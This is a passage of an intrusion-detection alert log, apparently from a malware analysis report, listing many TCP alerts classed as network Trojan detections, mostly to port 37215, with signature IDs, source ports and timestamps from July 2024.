                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679025
                  SID:2835222
                  Source Port:40222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.919298
                  SID:2835222
                  Source Port:59346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.489365
                  SID:2829579
                  Source Port:40660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.066216
                  SID:2835222
                  Source Port:41638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.686336
                  SID:2835222
                  Source Port:41088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323465
                  SID:2829579
                  Source Port:57252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423128
                  SID:2829579
                  Source Port:42696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.379647
                  SID:2835222
                  Source Port:54122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.915899
                  SID:2835222
                  Source Port:49138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:09.893581
                  SID:2030490
                  Source Port:43128
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522078
                  SID:2835222
                  Source Port:39610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.096498
                  SID:2835222
                  Source Port:41752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.036977
                  SID:2829579
                  Source Port:59078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591213
                  SID:2835222
                  Source Port:46434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.599600
                  SID:2829579
                  Source Port:42208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.973099
                  SID:2835222
                  Source Port:47740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019376
                  SID:2835222
                  Source Port:46290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099427
                  SID:2835222
                  Source Port:39048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2835222
                  Source Port:59652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202822
                  SID:2835222
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098599
                  SID:2835222
                  Source Port:34092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.428443
                  SID:2829579
                  Source Port:59792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2835222
                  Source Port:52558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.542613
                  SID:2835222
                  Source Port:59400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.520739
                  SID:2829579
                  Source Port:58538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833831
                  SID:2835222
                  Source Port:38232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:36028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840335
                  SID:2829579
                  Source Port:50904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.967012
                  SID:2835222
                  Source Port:37196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.397079
                  SID:2829579
                  Source Port:57724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.053819
                  SID:2829579
                  Source Port:58412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.619838
                  SID:2835222
                  Source Port:33550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2829579
                  Source Port:36622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.006424
                  SID:2835222
                  Source Port:45830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386841
                  SID:2835222
                  Source Port:56206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.713774
                  SID:2829579
                  Source Port:52058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069445
                  SID:2835222
                  Source Port:50524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575956
                  SID:2835222
                  Source Port:53912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.817162
                  SID:2835222
                  Source Port:38068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757034
                  SID:2829579
                  Source Port:45188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.529678
                  SID:2829579
                  Source Port:35936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757689
                  SID:2835222
                  Source Port:42168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891062
                  SID:2835222
                  Source Port:33480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533140
                  SID:2829579
                  Source Port:42680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.246570
                  SID:2835222
                  Source Port:54656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.627693
                  SID:2829579
                  Source Port:59814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.407026
                  SID:2829579
                  Source Port:33414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.321754
                  SID:2835222
                  Source Port:55922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.819391
                  SID:2829579
                  Source Port:49480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.177651
                  SID:2835222
                  Source Port:34588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.481143
                  SID:2829579
                  Source Port:41720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.522836
                  SID:2835222
                  Source Port:58418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389913
                  SID:2835222
                  Source Port:35852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942038
                  SID:2835222
                  Source Port:52658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132092
                  SID:2829579
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.460852
                  SID:2835222
                  Source Port:34894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.947291
                  SID:2829579
                  Source Port:43918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.573653
                  SID:2835222
                  Source Port:52958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2835222
                  Source Port:33740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853209
                  SID:2829579
                  Source Port:35164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.787588
                  SID:2835222
                  Source Port:52826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.783807
                  SID:2829579
                  Source Port:45670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.829336
                  SID:2829579
                  Source Port:46064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.155156
                  SID:2829579
                  Source Port:48034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.525645
                  SID:2835222
                  Source Port:33372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.257380
                  SID:2835222
                  Source Port:41754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.835820
                  SID:2835222
                  Source Port:50818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.989706
                  SID:2835222
                  Source Port:33016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.882179
                  SID:2835222
                  Source Port:55676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.499663
                  SID:2829579
                  Source Port:38340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.815601
                  SID:2829579
                  Source Port:34378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.106591
                  SID:2835222
                  Source Port:60688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.952249
                  SID:2829579
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.047442
                  SID:2835222
                  Source Port:45628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376641
                  SID:2829579
                  Source Port:58470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.255855
                  SID:2829579
                  Source Port:55334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.643122
                  SID:2829579
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.426647
                  SID:2829579
                  Source Port:49982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.615348
                  SID:2829579
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.323441
                  SID:2829579
                  Source Port:48310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2835222
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389277
                  SID:2835222
                  Source Port:49982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.135196
                  SID:2829579
                  Source Port:43418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.841554
                  SID:2835222
                  Source Port:49670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.002170
                  SID:2829579
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372350
                  SID:2829579
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.803034
                  SID:2829579
                  Source Port:36732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.178042
                  SID:2835222
                  Source Port:54058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.584145
                  SID:2835222
                  Source Port:35790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.654831
                  SID:2835222
                  Source Port:45472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.094211
                  SID:2835222
                  Source Port:38046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551943
                  SID:2835222
                  Source Port:52912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.109532
                  SID:2030490
                  Source Port:36374
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.093186
                  SID:2835222
                  Source Port:52228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2829579
                  Source Port:42340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612567
                  SID:2835222
                  Source Port:40582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.379647
                  SID:2829579
                  Source Port:57762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.501206
                  SID:2835222
                  Source Port:48014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.213910
                  SID:2829579
                  Source Port:56458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835821
                  SID:2829579
                  Source Port:58190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778927
                  SID:2829579
                  Source Port:51464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433221
                  SID:2835222
                  Source Port:55516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.999286
                  SID:2835222
                  Source Port:33308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588414
                  SID:2835222
                  Source Port:47106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487649
                  SID:2835222
                  Source Port:52360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.520093
                  SID:2835222
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.203668
                  SID:2829579
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744023
                  SID:2835222
                  Source Port:57328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525692
                  SID:2829579
                  Source Port:58474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893533
                  SID:2829579
                  Source Port:45386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871389
                  SID:2829579
                  Source Port:36696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.523308
                  SID:2829579
                  Source Port:45388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.397697
                  SID:2835222
                  Source Port:60184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.880000
                  SID:2829579
                  Source Port:47734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.259688
                  SID:2835222
                  Source Port:40094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422103
                  SID:2835222
                  Source Port:34754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2835222
                  Source Port:55190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.832820
                  SID:2835222
                  Source Port:44488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.329184
                  SID:2835222
                  Source Port:36106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.601201
                  SID:2829579
                  Source Port:38830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.593375
                  SID:2835222
                  Source Port:46468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850183
                  SID:2835222
                  Source Port:54598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.046169
                  SID:2829579
                  Source Port:45950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386959
                  SID:2835222
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519002
                  SID:2835222
                  Source Port:52726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.551193
                  SID:2835222
                  Source Port:35586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.565253
                  SID:2835222
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.834773
                  SID:2835222
                  Source Port:54006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2835222
                  Source Port:49020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850247
                  SID:2835222
                  Source Port:33882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.952758
                  SID:2829579
                  Source Port:54854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2835222
                  Source Port:43334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.941431
                  SID:2835222
                  Source Port:58192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2829579
                  Source Port:56854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064237
                  SID:2829579
                  Source Port:39418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559364
                  SID:2829579
                  Source Port:58746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.400460
                  SID:2835222
                  Source Port:33314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.090184
                  SID:2829579
                  Source Port:47630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2829579
                  Source Port:54460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.548179
                  SID:2835222
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.289201
                  SID:2829579
                  Source Port:57960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890636
                  SID:2829579
                  Source Port:56432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044881
                  SID:2829579
                  Source Port:37152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667245
                  SID:2829579
                  Source Port:60788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298148
                  SID:2829579
                  Source Port:57264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2835222
                  Source Port:42820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847797
                  SID:2835222
                  Source Port:58862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.834024
                  SID:2835222
                  Source Port:45726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478512
                  SID:2835222
                  Source Port:49156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.557589
                  SID:2835222
                  Source Port:54914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.365607
                  SID:2829579
                  Source Port:52308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.527963
                  SID:2829579
                  Source Port:44112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929262
                  SID:2829579
                  Source Port:37540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2829579
                  Source Port:53478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415225
                  SID:2829579
                  Source Port:38378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.785071
                  SID:2835222
                  Source Port:36786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.717127
                  SID:2829579
                  Source Port:47624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005251
                  SID:2835222
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.849531
                  SID:2835222
                  Source Port:38608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.891775
                  SID:2835222
                  Source Port:37032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502645
                  SID:2829579
                  Source Port:58240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2829579
                  Source Port:47738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.596946
                  SID:2829579
                  Source Port:58080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.036328
                  SID:2829579
                  Source Port:59520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.591175
                  SID:2829579
                  Source Port:52538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851585
                  SID:2835222
                  Source Port:48388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.777206
                  SID:2829579
                  Source Port:51688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.702243
                  SID:2835222
                  Source Port:50902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.375610
                  SID:2829579
                  Source Port:43624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.360429
                  SID:2835222
                  Source Port:47734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.723777
                  SID:2835222
                  Source Port:56920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.092016
                  SID:2829579
                  Source Port:58130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2829579
                  Source Port:42376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.764309
                  SID:2829579
                  Source Port:52798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.343615
                  SID:2835222
                  Source Port:39684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.932459
                  SID:2835222
                  Source Port:49334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.108288
                  SID:2835222
                  Source Port:50582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.432680
                  SID:2835222
                  Source Port:38300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.864368
                  SID:2835222
                  Source Port:54362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.213978
                  SID:2835222
                  Source Port:44794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043481
                  SID:2835222
                  Source Port:55564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781347
                  SID:2835222
                  Source Port:59268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.880415
                  SID:2829579
